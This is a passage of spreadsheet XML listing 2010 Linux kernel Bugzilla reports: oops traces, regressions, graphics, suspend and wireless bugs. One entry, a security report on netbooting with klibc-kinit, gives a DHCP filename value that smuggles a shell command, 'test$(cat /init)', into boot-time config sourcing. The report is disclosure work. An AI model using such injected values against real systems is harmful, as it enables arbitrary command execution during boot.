finish_wait+0x66/0x6e [&lt;ffffffff810e3664&gt;] ? congestion_wait+0x80/0x8f [&lt;ffffffff810d897e&gt;] shrink_inactive_list+0x447/0x655 [&lt;ffffffff8121dffa&gt;] ? __up_read+0x1a/0x7f [&lt;ffffffff810d460c&gt;] ? determine_dirtyable_memory+0x1a/0x2d [&lt;ffffffff810d4698&gt;] ? get_dirty_limits+0x27/0x25e [&lt;ffffffff810d8ec8&gt;] shrink_list+0xb7/0xc2 [&lt;ffffffff810d9196&gt;] shrink_zone+0x2c3/0x361 [&lt;ffffffff810d947f&gt;] ? shrink_slab+0x14f/0x161 [&lt;ffffffff810da373&gt;] do_try_to_free_pages+0x1e9/0x352 [&lt;ffffffff810da5d6&gt;] try_to_free_pages+0x6e/0x70 [&lt;ffffffff810d7c62&gt;] ? isolate_pages_global+0x0/0x22a [&lt;ffffffff8142f852&gt;] ? _cond_resched+0xe/0x22 [&lt;ffffffff810d3828&gt;] __alloc_pages_nodemask+0x40f/0x66f [&lt;ffffffff810fb943&gt;] alloc_pages_current+0x95/0x9e [&lt;ffffffff811030cf&gt;] alloc_slab_page+0x1b/0x28 [&lt;ffffffff81103133&gt;] new_slab+0x57/0x1dc [&lt;ffffffff811038c6&gt;] __slab_alloc+0x266/0x43d [&lt;ffffffffa033280d&gt;] ? nfs_alloc_inode+0x1a/0x64 [nfs] [&lt;ffffffffa033280d&gt;] ? nfs_alloc_inode+0x1a/0x64 [nfs] [&lt;ffffffff81103d30&gt;] kmem_cache_alloc+0x9e/0x156 [&lt;ffffffffa033446a&gt;] ? nfs_find_actor+0x0/0x73 [nfs] [&lt;ffffffffa033280d&gt;] nfs_alloc_inode+0x1a/0x64 [nfs] [&lt;ffffffff81122542&gt;] alloc_inode+0x1d/0x7b [&lt;ffffffff81123246&gt;] iget5_locked+0x63/0x11d [&lt;ffffffffa0332857&gt;] ? nfs_init_locked+0x0/0x3c [nfs] [&lt;ffffffffa0333f93&gt;] nfs_fhget+0x55/0x52c [nfs] [&lt;ffffffffa032f79c&gt;] nfs_lookup+0x124/0x18d [nfs] [&lt;ffffffff81121304&gt;] ? d_alloc+0x181/0x1b8 [&lt;ffffffff81121304&gt;] ? d_alloc+0x181/0x1b8 [&lt;ffffffff81434448&gt;] ? sub_preempt_count+0x9/0x83 [&lt;ffffffff81431987&gt;] ? _spin_unlock+0x4a/0x58 [&lt;ffffffff81117cd7&gt;] do_lookup+0xd1/0x167 [&lt;ffffffff811186a9&gt;] __link_path_walk+0x591/0x6c2 [&lt;ffffffff8111897a&gt;] path_walk+0x4c/0x8f [&lt;ffffffff81221880&gt;] ? strncpy_from_user+0x3d/0x41 [&lt;ffffffff81119ec5&gt;] do_path_lookup+0x2a/0x8b [&lt;ffffffff8111b4fe&gt;] user_path_at+0x56/0x93 [&lt;ffffffff81125d73&gt;] ? mntput_no_expire+0x29/0xfa [&lt;ffffffff81117968&gt;] ? mntput+0x1d/0x1f [&lt;ffffffff8111331d&gt;] vfs_fstatat+0x37/0x62 [&lt;ffffffff811133a3&gt;] vfs_lstat+0x1e/0x20 [&lt;ffffffff81038936&gt;] sys32_lstat64+0x1f/0x39 [&lt;ffffffff81117a91&gt;] ? path_put+0x22/0x26 [&lt;ffffffff814310f2&gt;] ? trace_hardirqs_off_thunk+0x3a/0x3c [&lt;ffffffff8103744f&gt;] sysenter_dispatch+0x7/0x33 [&lt;ffffffff814310b3&gt;] ? trace_hardirqs_on_thunk+0x3a/0x3f Code: 41 55 41 54 53 48 83 ec 08 0f 1f 44 00 00 48 8b 47 18 48 89 fb 48 8b 00 41 89 f5 4c 8b 60 f8 48 8d 88 e8 fd ff ff 4d 85 e4 75 04 &lt;0f&gt; 0b eb fe 48 8b 17 b8 01 00 00 00 80 e6 10 74 56 f6 05 62 e3 RIP [&lt;ffffffffa0354f63&gt;] nfs_fscache_release_page+0x2f/0x9e [nfs] RSP &lt;ffff88006a3252d8&gt; ---[ end trace 3cc500df7f6b03e1 ]---</t>
  </si>
  <si>
    <t>Oops on startup: Kernel failure: EDAC amd64: WARNING: ECC is disabled by BIOS</t>
  </si>
  <si>
    <t>2.6.32-5 amd64 (Debian package)</t>
  </si>
  <si>
    <t>2010-02-06 12:00 UTC</t>
  </si>
  <si>
    <t>Thomas PIERSON</t>
  </si>
  <si>
    <t>2010-05-01 16:30 UTC</t>
  </si>
  <si>
    <t>Created attachment 24927 [details] Kernel log Hi, I just reinstall my distribution and change from x86 arch to amd64 arch. I am using a Debian testing amd64 distribution. On fist startup, when kde load is finished, a kernel oops is raised: " Kernel failure message 1: EDAC amd64: WARNING: ECC is disabled by BIOS. Module will NOT be loaded. Either Enable ECC in the BIOS, or set 'ecc_enable_override'. Also, use of the override can cause unknown side effects. amd64_edac: probe of 0000:00:18.2 failed with error -22 k8temp 0000:00:18.3: Temperature readouts might be wrong - check erratum #141 input: PC Speaker as /devices/platform/pcspkr/input/input5 parport_pc 00:0a: reported by Plug and Play ACPI parport0: PC-style at 0x378, irq 7 [PCSPP,TRISTATE,EPP] i2c i2c-0: nForce2 SMBus adapter at 0x1c00 ACPI: I/O resource nForce2_smbus [0x1c40-0x1c7f] conflicts with ACPI region SM00 [0x1c40-0x1c45] ACPI: If an ACPI driver is available for this device, you should use it instead of the native driver nForce2_smbus 0000:00:01.1: Error probing SMB2. ACPI: PCI Interrupt Link [AAZA] enabled at IRQ 20 HDA Intel 0000:00:06.1: PCI INT B -&gt; Link[AAZA] -&gt; GSI 20 (level, low) -&gt; IRQ 20 HDA Intel 0000:00:06.1: setting latency timer to 64 input: HDA Digital PCBeep as /devices/pci0000:00/0000:00:06.1/input/input6 Adding 2650684k swap on /dev/sda5. Priority:-1 extents:1 across:2650684k loop: module loaded EXT4-fs (sda3): mounted filesystem with ordered data mode alloc irq_desc for 30 on node 0 alloc kstat_irqs on node 0 forcedeth 0000:00:08.0: irq 30 for MSI/MSI-X fuse init (API version 7.13) powernow-k8: Found 1 AMD Athlon(tm) 64 X2 Dual Core Processor 5600+ processors (2 cpu cores) (version 2.20.00) [Firmware Bug]: powernow-k8: No compatible ACPI _PSS objects found. [Firmware Bug]: powernow-k8: Try again with latest BIOS. " I found the same problem on ubuntu bug tracker: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/422536 and it is seem to be fixed. I found this maybe explain my problem : http://patchwork.kernel.org/patch/36833/ I found this maybe explain my problem : http://www.pubbs.net/kernel/200909/98769/ I did not notice any visible consequences on the system yet. Is there a risk of data loss or others serious consequences? (I hesitate to reconnect and set up a raid1 soft on this system.) Best regards, Thomas PIERSON</t>
  </si>
  <si>
    <t>Enabling netconsole triggers kernel bug</t>
  </si>
  <si>
    <t>2.6.27.45</t>
  </si>
  <si>
    <t>2010-02-06 15:18 UTC</t>
  </si>
  <si>
    <t>2012-05-14 15:05 UTC</t>
  </si>
  <si>
    <t>Enabling netconsole via the script below on a kernel with kernel debugging enabled resulted in a kernel bug. Note: I have not yet seen this bug report on newer mainline kernels. #!/bin/bash set -e dmesg -n 8 modprobe configfs if ! grep -wq configfs /proc/mounts; then mount -t configfs none /sys/kernel/config fi modprobe netconsole while [ ! -e /sys/kernel/config/netconsole ]; do usleep 100000 done if [ -e /sys/kernel/config/netconsole/antec ]; then rmdir /sys/kernel/config/netconsole/antec fi mkdir /sys/kernel/config/netconsole/antec cd /sys/kernel/config/netconsole/antec || exit $? echo eth0 &gt; dev_name echo 192.168.2.6 &gt; remote_ip #echo 00:1e:8c:1c:82:98 &gt; remote_mac echo 00:22:15:81:74:2b &gt; remote_mac dmesg -n 8 echo 1 &gt; enabled console [netcon0] enabled BUG: using smp_processor_id() in preemptible [00000000] code: modprobe/17212 caller is wake_up_klogd+0x31/0x50 Pid: 17212, comm: modprobe Not tainted 2.6.27.45-scst-debug #1 Call Trace: [&lt;ffffffff8036bfcd&gt;] debug_smp_processor_id+0xdd/0x100 [&lt;ffffffff802479c1&gt;] wake_up_klogd+0x31/0x50 [&lt;ffffffff80247bed&gt;] release_console_sem+0x20d/0x230 [&lt;ffffffff802484ed&gt;] register_console+0x15d/0x300 [&lt;ffffffffa01911a1&gt;] init_netconsole+0x1a1/0x207 [netconsole] [&lt;ffffffffa0191000&gt;] ? init_netconsole+0x0/0x207 [netconsole] [&lt;ffffffff8020903c&gt;] _stext+0x3c/0x160 [&lt;ffffffff8026f2ad&gt;] ? trace_hardirqs_on+0xd/0x10 [&lt;ffffffff8027bd49&gt;] sys_init_module+0xa9/0x1e0 [&lt;ffffffff8020c63b&gt;] system_call_fastpath+0x16/0x1b netconsole: network logging started netconsole: local port 6665 netconsole: local IP 0.0.0.0 netconsole: interface eth0 netconsole: remote port 6666 netconsole: remote IP 192.168.2.6 netconsole: remote ethernet address 00:22:15:81:74:2b netconsole: local IP 192.168.2.1 netconsole: network logging started</t>
  </si>
  <si>
    <t>[2.6.33-rc5] tty: possible irq lock inversion dependency in tty_fasync</t>
  </si>
  <si>
    <t>2010-02-07 09:09 UTC</t>
  </si>
  <si>
    <t>Maciej Rutecki</t>
  </si>
  <si>
    <t>2010-02-07 21:09 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.33-rc5] tty: possible irq lock inversion dependency in tty_fasync Submitter : Tetsuo Handa &lt;penguin-kernel@I-love.SAKURA.ne.jp&gt; Date : 2010-02-07 5:52 References : http://marc.info/?l=linux-kernel&amp;m=126552198328604&amp;w=2 Handled-By : First-Bad-Commit : http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=703625118069f9f8960d356676662d3db5a9d116 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drm/i915: implement new pm ops disables irq on aborted s2disk</t>
  </si>
  <si>
    <t>2010-02-07 20:55 UTC</t>
  </si>
  <si>
    <t>2010-02-14 22:31 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] "drm/i915: implement new pm ops" disables irq on aborted s2disk Submitter : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; Date : 2010-02-03 03:18 Message-ID : 4B695BA0.4000007@tuffmail.co.uk References : https://lists.linux-foundation.org/pipermail/linux-pm/2010-February/024200.html Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://patchwork.kernel.org/patch/77640/ This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline. Caused by: commit cbda12d77ea590082edb6d30bd342a67ebc459e0 Author: Zhenyu Wang &lt;zhenyuw@linux.intel.com&gt; Date: Wed Dec 16 13:36:10 2009 +0800 drm/i915: implement new pm ops for i915 Signed-off-by: Zhenyu Wang &lt;zhenyuw@linux.intel.com&gt; Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; First-Bad-Commit : cbda12d77ea590082edb6d30bd342a67ebc459e0</t>
  </si>
  <si>
    <t>ioctl32(mdadm:2243): Unknown cmd fd(3) cmd(800c0910){t:09;sz:12} arg(ffb7f9c4)</t>
  </si>
  <si>
    <t>2010-02-07 21:22 UTC</t>
  </si>
  <si>
    <t>2010-02-14 23:33 UTC</t>
  </si>
  <si>
    <t>Subject : compat_ioctl: ignore RAID_VERSION ioctl Submitter : "Michael S. Tsirkin" &lt;m.s.tsirkin@gmail.com&gt; Date : 2010-01-30 22:02 Message-ID : 201001302302.10574.arnd@arndb.de References : http://marc.info/?l=linux-kernel&amp;m=126489038709553&amp;w=4 Handled-By : Arnd Bergmann &lt;arnd@arndb.de&gt; Patch : http://patchwork.kernel.org/patch/75931/ This entry is being used for tracking a regression from 2.6.. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Bizarre reproducible resume failure on MBP</t>
  </si>
  <si>
    <t>2010-02-09 16:33 UTC</t>
  </si>
  <si>
    <t>jwatzman</t>
  </si>
  <si>
    <t>2011-01-17 22:25 UTC</t>
  </si>
  <si>
    <t>(Reported on LKML yesterday, but this is probably the correct place to report it -- sorry! I've never tried to track down a kernel bug before :)) I'm having some weird issues where my MacBook Pro fails to resume from suspend. The failure mode is: backlight on, cdrom drive does its "reset" noise thing, but nothing other than that -- no response to keyboard, for example, when Control-Alt-F1 then Control-Alt-Delete should reboot. The following kernels consistently FAIL when resuming: - 2.6.32.7 built from kernel.org 2.6.32 tarball + 2.6.32.7 patch - 2.6.32.6 built from git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-2.6.32.y.git - 2.6.32.7 built from git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-2.6.32.y.git The following kernel consistently SUCCEEDS when resuming: - 2.6.32.6 built from kernel.org 2.6.32 tarball + 2.6.32.6 patch Note that 2.6.32.6 either fails or succeeds depending upon how I build it! To make sure, I built the two variations of .6 on the same day, no system changes in between, with the same .config, and did a diff of the source -- everything was the same AFAICT, but the git one fails and the tarball one is fine! The failures and successes have been consistent, so either the issue is intermittent and I'm *really* unlucky or something really strange is going on. Google suggested to turn on the PM debug options and try a couple of things; I did the following on the tty of a 2.6.32.6 git build with .config modified only to turn on PM debugging: - run through the /sys/power/pm_test options; it resumes successfully from everything except "none" - echo 1 &gt; /sys/power/pm_trace and use the magic number. dmesg on the next boot reported the number as "0:168:740" corresponding to "drivers/base/power/main.c:430" -- it did not report a device I have no idea how to debug this further Specs: MacBookPro2,2; Debian sid (not quite up-to-date as I keep things consistent to track this down); Core 2 Duo 2.33Ghz; 2G ram; 1G swapfile</t>
  </si>
  <si>
    <t>2011-07-30 06:26 UTC</t>
  </si>
  <si>
    <t>Netbooting can lead to arbitrary commands execution</t>
  </si>
  <si>
    <t>2010-02-11 11:39 UTC</t>
  </si>
  <si>
    <t>Andrea Canciani</t>
  </si>
  <si>
    <t>2012-05-14 17:14 UTC</t>
  </si>
  <si>
    <t>other_klibc-kinit</t>
  </si>
  <si>
    <t>Created attachment 24990 [details] Patch to add string escaping At boot, init typically configures networking by running ipconfig and sourcing /tmp/net-*.conf right after it. An (intentionally) misconfigured DHCP server can send arbitrary commands to be executed in the sourcing (tested on Ubuntu Karmic Koala kernel 2.6.31-14) because no escaping is applied to the strings. For example, a DHCP server passing a filename of "test$(cat /init)" makes the boot sequence display the content of the init file.</t>
  </si>
  <si>
    <t>Regression in ptrace (Wine) starting with 2.6.33-rc1</t>
  </si>
  <si>
    <t>2010-02-11 16:21 UTC</t>
  </si>
  <si>
    <t>Michael Stefaniuc</t>
  </si>
  <si>
    <t>2010-02-22 22:15 UTC</t>
  </si>
  <si>
    <t>2.6.33-rc1 broke ptrace for Wine, specifically the setting of the debug registers. This is visible in the Wine ntdll exception tests failing on 2.6.33-rcX while they work just fine in 2.6.32. A regression test resulted in: 72f674d203cd230426437cdcf7dd6f681dad8b0d is the first bad commit commit 72f674d203cd230426437cdcf7dd6f681dad8b0d Author: K.Prasad &lt;prasad@linux.vnet.ibm.com&gt; Date: Mon Jun 1 23:45:48 2009 +0530 hw-breakpoints: modify Ptrace routines to access breakpoint registers This patch modifies the ptrace code to use the new wrapper routines around the debug/breakpoint registers. [ Impact: adapt x86 ptrace to the new breakpoint Api ] Original-patch-by: Alan Stern &lt;stern@rowland.harvard.edu&gt; Signed-off-by: K.Prasad &lt;prasad@linux.vnet.ibm.com&gt; Signed-off-by: Maneesh Soni &lt;maneesh@linux.vnet.ibm.com&gt; Reviewed-by: Alan Stern &lt;stern@rowland.harvard.edu&gt; Signed-off-by: Frederic Weisbecker &lt;fweisbec@gmail.com&gt; :040000 040000 f72ff4760c3fa1dffcd72494e77bee2c76039505 b60d5fe2088ff635568e800d5759a0b373b5e439 M arch The first ntdll exception test in test_exceptions() http://source.winehq.org/git/wine.git/?a=blob;f=dlls/ntdll/tests/exception.c;h=9149b6961764dec31a0af5cd3b93ab3072703dbb;hb=312e4f6b235a468f8bf764101a5b97cf34dd4143#l594 run_exception_test(dreg_handler, NULL, &amp;segfault_code, sizeof(segfault_code), 0); produces (make exception.ok) the output: err:seh:setup_exception_record stack overflow 932 bytes in thread 0009 eip 7bc3c97f esp 00240f8c stack 0x240000-0x241000-0x340000 The stack overflow is detected by the ntdll internal function setup_exception_record() http://source.winehq.org/git/wine.git/?a=blob;f=dlls/ntdll/signal_i386.c;h=4eccb61954c43d75144575411313d59405decfc3;hb=312e4f6b235a468f8bf764101a5b97cf34dd4143#l1495 which aborts the thread. The problem happens on both i386 (Intel Atom CPU) as well as on x86_64 (Intel Q9450); the stack overflow bytes differ though but are always the same for each box. All the ntdll exception tests run just fine with 2.6.32 and older kernels. For a summary of the ntdll exception tests please see http://test.winehq.org/data/tests/ntdll:exception.html in the Wine column. thanks bye michael</t>
  </si>
  <si>
    <t>latest git kernel: general protection fault: 0000 [#1]</t>
  </si>
  <si>
    <t>2010-02-11 19:37 UTC</t>
  </si>
  <si>
    <t>2010-12-07 20:31 UTC</t>
  </si>
  <si>
    <t>Subject : latest git kernel: general protection fault: 0000 [#1] Submitter : Markus Trippelsdorf &lt;markus@trippelsdorf.de&gt; Date : 2010-02-09 8:36 Message-ID : 20100209083605.GA1766@arch.tripp.de References : http://marc.info/?l=linux-kernel&amp;m=126570498804223&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.32.8</t>
  </si>
  <si>
    <t>RadeonKMS segfaults kdm on mobility radeon x700 pcie</t>
  </si>
  <si>
    <t>2.6.34-rc1</t>
  </si>
  <si>
    <t>2010-02-12 17:58 UTC</t>
  </si>
  <si>
    <t>2010-03-27 23:34 UTC</t>
  </si>
  <si>
    <t>Using the KMS option of the radeon-driver makes the kernel segfault and reboot when starting an kde session. This happens on daves radeon-testing tree using latest mesa-git and libdrm-git. Also happens on latest linus tree. The same combination works great when using the non-kms codepath. Hardware is an mobility radeon x700 pcie. lspci -vn: 02:00.0 0300: 1002:5653 (prog-if 00 [VGA controller]) Subsystem: 1734:1093 Flags: bus master, fast devsel, latency 0, IRQ 24 Memory at b0000000 (64-bit, prefetchable) [size=128M] Memory at feaf0000 (64-bit, non-prefetchable) [size=64K] I/O ports at b000 [size=256] Expansion ROM at feac0000 [disabled] [size=128K] Capabilities: [50] Power Management version 2 Capabilities: [58] Express Endpoint, MSI 00 Capabilities: [80] MSI: Enable- Count=1/1 Maskable- 64bit+ Capabilities: [100] Advanced Error Reporting</t>
  </si>
  <si>
    <t>Flash video laggy inside Firefox only with KMS</t>
  </si>
  <si>
    <t>2010-02-13 14:53 UTC</t>
  </si>
  <si>
    <t>2010-03-21 20:05 UTC</t>
  </si>
  <si>
    <t>System specs: Arch Linux (20100212) x86_64 Lenovo U330 with Radeon 3450 and Intel 4500MHD Kernel: 2.6.33-rc7 vanilla KDE SC 4.4 (from KDEmod) mesa: git 20100212 libdrm: git 20100212 xf86-video-ati: git 20100212 xf86-video-intel: git 20100212 flashplugin: 10.0.45.2 x86_64 Firefox 3.6 Running radeon KMS and intel KMS (switchable graphics). I know it's hard to debug problems with closed-source things, but I guess there is a regression in KMS code regarding video playback in flashplugin. It happens for many flash video players, but not all (doesn't happen for youtube) For example: http://vimeo.com/6194911 I've got laggy in-flash video buttons, the playback is skippy, I have one core maxed-out. Firefox is also laggy, RMS context-menu takes 2-3 seconds to open. When I switch to full screen mode, everything is fine and dandy: playback is smooth, flash video control buttons work. This seems like an issue with video rendering inside other windows. It doesn't happen for Intel KMS or the same radeon driver working in UMS. Happens regardless of compositing on/off. I'm not the only one with this problem: http://bbs.archlinux.org/viewtopic.php?pid=707955#p707955 I don't know if I posted this regression into the right bugtracker. I thought since this issue arises only in KMS and not UMS, it's a kernel module problem.</t>
  </si>
  <si>
    <t>scaling_max_freq value lost upon suspend</t>
  </si>
  <si>
    <t>3.6.7</t>
  </si>
  <si>
    <t>2010-02-14 01:19 UTC</t>
  </si>
  <si>
    <t>2013-06-18 14:34 UTC</t>
  </si>
  <si>
    <t>Created attachment 25037 [details] Kernel Configuration Bug: Altered scaling_max_freq should be preserved over suspend-cycles. Steps to reproduce: 0. Compile and boot kernel according to the attached .config 1. Alter scaling_max_freq 2. Suspend to RAM and wake up 3. scaling_max_freq is set to it's maximum</t>
  </si>
  <si>
    <t>WLAN cannot be activated if booted with activated RF kill switch on Sony notebook (iwl3945)</t>
  </si>
  <si>
    <t>2010-02-14 22:59 UTC</t>
  </si>
  <si>
    <t>Thomas Klose</t>
  </si>
  <si>
    <t>Keywords: WLAN, RF kill switch, iwl3945, sony-laptop Kernel version: Linux version 2.6.32-13-generic (buildd@vernadsky) (gcc version 4.4.3 (Ubuntu 4.4.3-2ubuntu1) ) #18-Ubuntu SMP Wed Feb 10 21:24:20 UTC 2010 (I was also able to confirm the problem with Ubuntu Karmic and Fedora 12) Description: If the RF kill switch is activated during booting my Sony Notebook (VGN-TX3HP) WLAN cannot be activated later. If WLAN is activated during boot it can be deactivated and reactivated without problems. I was able to narrow down the problem: If I unload the sony-laptop module before disabling the kill switch, WLAN becomes active without problems. Then I can load sony-laptop without it is causing problems. This problem did not occur with Kernel versions &lt;=2.6.28 (at least). Steps to reproduce the problem: - get a Sony Vaio laptop with iwl3945 hardware (my is a TX3HP) - enable RF kill switch (disable WLAN) - boot Linux - disable RF kill switch (enable WLAN) - WLAN does not become available Steps to reproduce my workaround: - get a Sony Vaio laptop with iwl3945 hardware (my is a TX3HP) - enable RF kill switch (disable WLAN) - boot Linux - unload sony-laptop module - disable RF kill switch (enable WLAN) - WLAN becomes available - load sony-laptop module</t>
  </si>
  <si>
    <t>Dell video dies when booting</t>
  </si>
  <si>
    <t>2010-02-14 23:05 UTC</t>
  </si>
  <si>
    <t>2010-07-24 22:50 UTC</t>
  </si>
  <si>
    <t>Subject : Dell video dies when booting 2.26.32.[78]. Submitter : David Ronis &lt;ronis@ronispc.chem.mcgill.ca&gt; Date : 2010-02-14 1:07 Message-ID : 1266109622.11290.10.camel@montroll.chem.mcgill.ca References : http://marc.info/?l=linux-kernel&amp;m=126611098225127&amp;w=4 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.33-rc8 breaks UML with Restrict initial stack space expansion to rlimit</t>
  </si>
  <si>
    <t>2.6.33-rc8</t>
  </si>
  <si>
    <t>2010-02-14 23:20 UTC</t>
  </si>
  <si>
    <t>2010-02-23 23:56 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.33-rc8 breaks UML with Restrict initial stack space expansion to rlimit Submitter : Jouni Malinen &lt;j@w1.fi&gt; Date : 2010-02-14 16:40 Message-ID : 20100214164023.GA2726@jm.kir.nu References : http://marc.info/?l=linux-kernel&amp;m=126616751807902&amp;w=4 Handled-By : Michael Neuling &lt;mikey@neuling.org&gt; This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ACPI/ata regression with hotplugging the dvd drive</t>
  </si>
  <si>
    <t>2010-02-15 19:22 UTC</t>
  </si>
  <si>
    <t>2010-03-02 19:38 UTC</t>
  </si>
  <si>
    <t>Subject : ACPI/ata regression with hotplugging the dvd drive Submitter : Dariush Forouher &lt;dariush@forouher.de&gt; Date : 2010-02-13 16:31 Message-ID : 4B76D3E7.6000904@forouher.de References : http://marc.info/?l=linux-kernel&amp;m=126607873824718&amp;w=2 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Removing external USB btrfs drive causes kernel crash</t>
  </si>
  <si>
    <t>2010-02-16 07:39 UTC</t>
  </si>
  <si>
    <t>rocko</t>
  </si>
  <si>
    <t>2012-05-15 00:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 25061 [details] syslog of btfrs kernel crash This bug hangs the kernel. I've experienced it twice now. See attached log. Both times the crash happened after I suspended with an external btrfs drive plugged in and resumed without it. The first time the crash happened before X's screen saver password entry screen could appear, the second time around six hours after resume. The second time I could see that the system thought the external drive was still mounted after resume (ie its icon was still on the desktop). Version info: Ubuntu 9.10, 2.6.33-rc8 amd64 Note: This might be the same as bug #15267 (which was reported against 2.6.32.5).</t>
  </si>
  <si>
    <t>[855GM] random freezes</t>
  </si>
  <si>
    <t>2010-02-16 18:31 UTC</t>
  </si>
  <si>
    <t>2010-03-21 19:48 UTC</t>
  </si>
  <si>
    <t>Laptop: HP Compaq nx9020 Display controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02) OS: Arch Linux i686 kernel-2.6.32.8 with patch from http://bugzilla.kernel.org/show_bug.cgi?id=14957 xorg-server-1.7.4.901 xf86-video-intel-2.10.0 mesa-7.7 By "freeze" I mean that it's not possible to move the mouse pointer or use the keyboard. Kernel log message: Feb 16 20:38:01 takron kernel: ------------[ cut here ]------------ Feb 16 20:38:01 takron kernel: kernel BUG at drivers/gpu/drm/i915/i915_gem.c:2108! Feb 16 20:38:01 takron kernel: invalid opcode: 0000 [#1] PREEMPT SMP Feb 16 20:38:01 takron kernel: last sysfs file: /sys/devices/virtual/hwmon/hwmon0/temp1_input Feb 16 20:38:01 takron kernel: Modules linked in: nfs lockd fscache nfs_acl auth_rpcgss sunrpc michael_mic arc4 ecb lib80211_crypt_tkip ipv6 ext2 pcmcia snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device yenta_socket rsrc_nonstatic pcmcia_core snd_pcm_oss snd_mixer_oss 8139too mii ipw2200 libipw lib80211 snd_intel8x0m joydev snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_timer iTCO_wdt iTCO_vendor_support psmouse snd fuse uhci_hcd shpchp container soundcore snd_page_alloc wmi ac battery ehci_hcd i2c_i801 sg processor pci_hotplug thermal usbcore evdev serio_raw vboxdrv rtc_cmos rtc_core rtc_lib ext4 mbcache jbd2 crc16 sr_mod sd_mod cdrom ata_piix ata_generic pata_acpi libata scsi_mod i915 drm_kms_helper drm i2c_algo_bit button i2c_core video output intel_agp agpgart Feb 16 20:38:01 takron kernel: Feb 16 20:38:01 takron kernel: Pid: 4819, comm: X Not tainted (2.6.32-ARCH #1) compaq nx9020 (PG711ES#ABB) Feb 16 20:38:01 takron kernel: EIP: 0060:[&lt;ee8af465&gt;] EFLAGS: 00213246 CPU: 0 Feb 16 20:38:01 takron kernel: EIP is at i915_gem_evict_everything+0xe5/0x120 [i915] Feb 16 20:38:01 takron kernel: EAX: ed2f2000 EBX: ed315000 ECX: 00000000 EDX: 0000fdfd Feb 16 20:38:01 takron kernel: ESI: ed399400 EDI: ed315e0c EBP: ed315e20 ESP: ed2f3da4 Feb 16 20:38:01 takron kernel: DS: 007b ES: 007b FS: 00d8 GS: 00e0 SS: 0068 Feb 16 20:38:01 takron kernel: Process X (pid: 4819, ti=ed2f2000 task=c21b0c90 task.ti=ed2f2000) Feb 16 20:38:01 takron kernel: Stack: Feb 16 20:38:01 takron kernel: 00000000 0000000a c02e4480 0000000a c02e49c0 ee8b0a80 00203292 ed278184 Feb 16 20:38:01 takron kernel: &lt;0&gt; 00203246 ed278000 00203286 00000001 c129a088 d6c53300 ed315000 c12b8a9c Feb 16 20:38:01 takron kernel: &lt;0&gt; de3b9940 c2381800 c22268a0 d12bf380 ed315000 c02e4480 de3b9800 c2381800 Feb 16 20:38:01 takron kernel: Call Trace: Feb 16 20:38:01 takron kernel: [&lt;ee8b0a80&gt;] ? i915_gem_execbuffer+0x830/0x1310 [i915] Feb 16 20:38:01 takron kernel: [&lt;c129a088&gt;] ? unix_stream_recvmsg+0x218/0x540 Feb 16 20:38:01 takron kernel: [&lt;c12b8a9c&gt;] ? __mutex_lock_slowpath+0x1ec/0x2c0 Feb 16 20:38:01 takron kernel: [&lt;ee75b298&gt;] ? drm_ioctl+0x158/0x320 [drm] Feb 16 20:38:01 takron kernel: [&lt;ee8b0250&gt;] ? i915_gem_execbuffer+0x0/0x1310 [i915] Feb 16 20:38:01 takron kernel: [&lt;c10e3c95&gt;] ? do_sync_read+0xd5/0x120 Feb 16 20:38:01 takron kernel: [&lt;c10f1d29&gt;] ? vfs_ioctl+0x89/0xa0 Feb 16 20:38:01 takron kernel: [&lt;c10f1ea9&gt;] ? do_vfs_ioctl+0x79/0x5c0 Feb 16 20:38:01 takron kernel: [&lt;ee8b18b0&gt;] ? i915_gem_fault+0x0/0x150 [i915] Feb 16 20:38:01 takron kernel: [&lt;c10e3d46&gt;] ? rw_verify_area+0x66/0xe0 Feb 16 20:38:01 takron kernel: [&lt;c1064a30&gt;] ? ktime_get_ts+0xd0/0x100 Feb 16 20:38:01 takron kernel: [&lt;c10f2466&gt;] ? sys_ioctl+0x76/0x90 Feb 16 20:38:01 takron kernel: [&lt;c10039f3&gt;] ? sysenter_do_call+0x12/0x28 Feb 16 20:38:01 takron kernel: Code: c0 89 c1 75 a6 89 f0 e8 ca fa ff ff 85 c0 89 c1 75 99 89 f8 89 0c 24 e8 6a ab a0 d2 3b ab 20 0e 00 00 74 0b 89 f8 e8 3b ae a0 d2 &lt;0f&gt; 0b eb fe 8d 83 18 0e 00 00 39 83 18 0e 00 00 75 e7 8d 83 10 Feb 16 20:38:01 takron kernel: EIP: [&lt;ee8af465&gt;] i915_gem_evict_everything+0xe5/0x120 [i915] SS:ESP 0068:ed2f3da4 Feb 16 20:38:01 takron kernel: ---[ end trace d4b77122adeb6f75 ]---</t>
  </si>
  <si>
    <t>high load avg, extreme sluggishness on T41 w/ Radeon Mobility M7</t>
  </si>
  <si>
    <t>2010-02-16 20:25 UTC</t>
  </si>
  <si>
    <t>2010-10-28 23:32 UTC</t>
  </si>
  <si>
